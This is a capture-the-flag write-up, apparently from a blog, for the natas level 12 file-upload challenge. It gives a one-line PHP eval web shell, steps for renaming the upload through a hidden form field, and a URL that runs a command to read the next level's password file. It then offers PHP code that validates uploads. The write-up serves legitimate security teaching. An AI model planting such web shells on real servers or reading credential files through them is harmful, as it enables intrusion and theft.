1. Objective
Find the password for natas level 13.
2. Introduction
The first thing we see is a form that gives us the ability to upload 'JPEG' images.
If proper checks have not been put in place to validate the uploaded file, it is highly likely that we may have a File Upload Vulnerability.
A File Upload Vulnerability is a security issue that arises when proper checks
are not implemented to validate uploaded files. In this level, we explore the
possibility of exploiting such a vulnerability.
3. Exploration
Let's use the 'View source code' button to check what clues we can find there.
The process that takes place on the server.
- A file name is generated before the page is served to the user
- The filename is stored in a hidden field called filename
- When a user uploads a file, the server checks if the filename field is present
- It prepares for the file to be saved in the upload folder
- Check if the size of the file is greater than 1000 bytes
- Reject the file if it is greater than the limit
- Otherwise upload it to the uploads folder
We notice that the only check that is performed is on the file is the size. No checks are made to ensure that we only upload jpeg files. That means we can upload whatever file type we want including php files and the server won't block it. Also, the file name to be used is passed to the client side, which means we can modify it to ensure our file is saved as php file
4. Crafting a php file
We will use a simple php exploit code
<?php echo eval($_GET['code']); ?>
- Enter the code above and save it in a php file
- Go to the form and select the php file
- Right click on the page and select inspect
- Change the value of the hidden field filename to something with a php extension, like shell.php
- Our file has been uploaded
- Click on the link to open the php file
- Change the url to this to read the file with the password for natas13
http://natas12.natas.labs.overthewire.org/upload/n60np7ud5p.php?code=cat%20/etc/natas_webpass/natas13
5. Success
With this, we have gained a basic understanding of File upload vulnerabilities and how to exploit it.
Use the password that you have acquired above to access the next level.
7. Preventing file upload vulnerabilities
Checking the file size is a good place to start to prevent file upload vulnerabilities but that alone is not enough. It is important to also ensure that the correct file type is being submitted to the server.
This can be done by:
- Checking the extension
- Checking the mime type
- Checking magic numbers
Here is php code that is potentially more secure than what we had on this level
<?php
function isSafeMimeType($file)
{
$allowedMimeTypes = ['image/jpeg'];
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$mimeType = finfo_file($finfo, $file);
finfo_close($finfo);
return in_array($mimeType, $allowedMimeTypes);
}
function isSafeMagicNumber($file)
{
// Magic numbers for JPEG files
$jpegMagicNumbers = ['FFD8FFDB','FFD8FFE0','FFD8FFE1', 'FFD8FFE2',];
// Add more if needed
$fileContents = file_get_contents($file);
$fileMagicNumber = strtoupper(bin2hex(substr($fileContents, 0, 4)));
return in_array($fileMagicNumber, $jpegMagicNumbers);
}
if (array_key_exists("filename", $_POST)) {
$uploadDirectory = "upload"; // Your upload directory path
// File Type Validation
if (!isSafeMimeType($_FILES['uploadedfile']['tmp_name'])) {
echo "Invalid file type. Only JPEG files are allowed.";
return;
}
// File Size Validation
$maxFileSize = 1000000; // 1 MB
if ($_FILES['uploadedfile']['size'] > $maxFileSize) {
echo "File is too big. Maximum allowed size is 1 MB.";
return;
}
// File Name Security
$filename = pathinfo($_POST["filename"], PATHINFO_FILENAME);
$filename = preg_replace("/[^A-Za-z0-9_]/", '_', $filename);
// Magic Number Validation
if (!isSafeMagicNumber($_FILES['uploadedfile']['tmp_name'])) {
echo "Invalid file content.";
return;
}
$targetPath = makeRandomPathFromFilename($uploadDirectory, $filename);
if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $targetPath)) {
echo "The file <a href=\"{$targetPath}\">{$targetPath}</a> has been uploaded";
}
else {
echo "There was an error uploading the file, please try again!";
}
}
?>
NthApostle
Comments
Post a Comment